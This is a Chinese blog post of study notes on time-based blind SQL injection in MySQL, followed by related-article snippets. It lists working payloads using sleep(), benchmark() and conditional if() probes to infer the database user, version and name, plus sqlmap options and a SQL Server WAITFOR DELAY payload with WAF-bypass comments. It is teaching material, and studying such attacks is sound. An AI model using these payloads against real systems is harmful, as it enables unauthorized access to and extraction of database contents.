SQL注入--延时注入笔记(也称为基于时间的盲注)

最新推荐文章于 2024-08-07 21:53:08 发布
最新推荐文章于 2024-08-07 21:53:08 发布
阅读量1k 收藏 2
点赞数
分类专栏: # SQL注入笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42751423/article/details/105975831
版权

延迟注入(时间盲注)

延时注入是通过页面返回的时间来判断的
不同的mysaql数据库版本,延迟注入语句也不同
mysql>=5.0的可以使用sleep()进行查询
mysql<5.0的可以使用benchmark()进行查询
benchmark用法
benchmark(n,sql语句)n为查询次数
通过查询次数增多时间变得缓慢来判断是否存在延迟
select benchmark(1000,select*from admin);
sleep()延迟注入用法
sleep可以强制产生一个固定的延迟。
sleep()延迟注入核心原理
and if(true,sleep(5),0);== F(1=1,true,false);
id=1 and sleep(5)判断下是否存在延迟注入
and if(substring(user(),1,4)=‘root’,sleep(5),1)判断当前用户
and if(MID(version(),1,1)LIKE 5,sleep(5),1)判断数据库版本信息是否为5可以去猜解他的数据库名称
and if(asci(substring(database(),1,4))>100,sleep(5),1)
sqlmap --time -sec=2延迟注入

可用burp suite中的爆破模块来跑,详细见笔记

https://www.cnblogs.com/startingpoint-fly/p/11158011.html

Simple_way
关注
专栏目录
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1386
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
Sqlmap————8、SQLmap延时注入
Fly_鹏程万里
05-05 7121
参数: --delay--safe-freq格式:Sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs   --delay    1sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs  --safe-freq   3其余的数据...
SQL注入---基于时间盲注
Ethan024的博客
03-31 468
SQL注入—基于时间盲注 实验平台: 皮卡丘靶场—盲注(base on time) 实验原理: 输入单引号’,确定此处没有报错信息: 输入payload:kobe’ and 1=1#,发现也没有报错信息 在浏览器后台—网络中查看payload执行时间:kobe’ and sleep(5)# 此处执行了sleep(5),执行时间用了5000ms。因此此处存在SQL注入,并且是基于时间盲注。 基于时间的延迟的payload:kobe’ and if((substr(database(),
SQL注入---时间盲注
最新发布
ningwangh的博客
08-07 1019
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
php延时注入,sqlmap –dns-domain 突破延时注入
weixin_36345268的博客
03-10 427
因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的–dns-domain 进行dns 注入,所以想本地模拟一个环境进行测试。首先dns注入>show variables like‘%skip%‘;+------------------------+-------+|Variable_n...
SQL SERVER数据库手工延时盲注语句
weixin_45682070的博客
06-25 1447
PHP+SQL SERVER的环境,存在POST注入,只能进行延时盲注,存在防火墙,Sqlmap能够绕过,但不能注入,手工注入语句如下: 也可编写脚本 判断是否存在注入: #inject为注入点,--OwlXXpFshm%0A绕过WAF,替换空格为注释+回车 #如果存在注入,返回的数据包将延时5秒以上 inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0A'0:0:5'-- 判断权限: #如果是sysadmin权限,则延时5秒 inject';if ( sel
基于时间差的SQL盲注技巧
weixin_30564785的博客
09-15 76
作者提出的技巧的主要思路是:在盲注(blind SQL injection)时,如果不同SQL injection 指令的结果,无法由 HTTP Response 本身得知,那么可以用时间差的方式判断。可以设计一个很耗时的 SQL 指令,这时如果 SQL injection 成功,那么这个SQL injection 指令的执行结果,会影响到 Web server 回复 HTTP response ...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 816
CTFHUB SQL
SQL注入(自学笔记
woqusss的博客
08-10 374
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
portswigger之SQL注入实验室笔记
m0_69349614的博客
07-06 1245
该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
【肾透测试笔记 --SQL注入篇_mysql】
A98llen的博客
05-10 581
SQL注入篇_mysql写在前面MySQL中的注释一些函数注入之前1.有无回显2.判断类型3.有无布尔类型4.判断是否有延时一、联合查询1.判断列数2.判断显示位置3.修改数字4.窃取数据库->表->列->数据库名表名列名数据二、报错注入1.updatexml2.extractvalue...三、布尔盲注1.确定库名长度,按位测试2.确定表名长度,按位测试3.dump数据四、延时注入1.确定数据库名字长度,按位测试2.确定数据表名字长度,按位测试3.dump数据五、堆叠查询 写在前面 My
burp-盲注测试技巧
05-03
burp盲注测试技巧
东哥视频学习笔记——SQL手工注入延时注入
gam0n的博客
08-28 392
注入成功和失败返回的内容是一样的时候,应该使用延时注入; if语法: if(条件,True,False); Select * from admin where id = 1 and name = if(2>1,"1","2"); sleep(1); 一、获取数据库总数: select count(SCHEMA_NAME) from information_sc...
Webug4.0 sql延时注入
angry_program的博客
01-04 344
延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应 当布尔注入不成功时, 即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入. 原理 通过构造真或假的条件sql语句,sql语句中根据真假使用sleep()函数向服务器发送请求,观察服务器响应结果是否会执行所设置时 ...
关于SQL时间盲注(基于sleep函数)的手动测试、burpsuite爆破、sqlmap全自动化注入
Welcome To Myon'Blog !
12-27 2979
这么说吧:一般sqlmap能跑出来的基本上都没啥问题,这种是不存在什么绕过和过滤的,一般存在过和过滤的,sqlmap基本上都跑不出来,需要手工注入。SQL时间注入是一种常见的SQL注入攻击方式,攻击者通过在SQL语句中注入时间相关的代码,来获取敏感信息或者执行非法操作。攻击者可以根据SQL语句的执行时间,来推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。6.09s,和我们设置的sleep 5s 差不多,说明sleep语句被执行了,存在时间盲注
如何使用burpsuite进行时间盲注爆破
weixin_44094420的博客
09-07 1312
burpsuite修改配置,使用bp进行时间盲注
mysql延迟注入br,实验3—SQL注入漏洞的攻击与防御(基于时间延迟的盲注
weixin_39886205的博客
03-18 411
1.实验名称SQL报错注入2.实验环境1、攻击机系统环境:Windows 7/8/102、浏览器:Firefox 53.0.2(64位)3、浏览器插件HackBar 1.6.3.13.实验原理3.1 SQL盲注用到的几个函数IF(Condition,A,B)函数:当Condition为TRUE时,返回A;当Condition为FALSE时,返回B。没有任何报错信息,只能靠时间线的长短来判断。利用前...
burp靶场sql注入通关—下
Zqinglele的博客
05-06 1320
1.根据提示修改包含 TrackingId cookie的请求,先抓包并修改这个值,在后面加上永真式发现出现Welcome back再修改这个值为永假式看看,发现没有Welcome back,有两种是或不是回显说明是布尔类型的2.利用是否有正确回显判断后面语句是否正确,出现Welcome back说明存在users表3.确定users表中是否存在administrator用户4.判断密码的长度,根据提示可知密码只包含小写字母和数字最终尝试出来密码长度为205.接下来测试出每位密码的值。
利用X-Forwarded-For注入时间盲注与SQL技巧
这个Bugku Web题目的INSERT INTO注入挑战要求选手运用高级的SQL注入技巧,尤其是时间盲注,来破解服务器的输入过滤机制,以获取数据库的相关信息。这既考察了技术能力,也考验了在实际环境中解决问题的策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值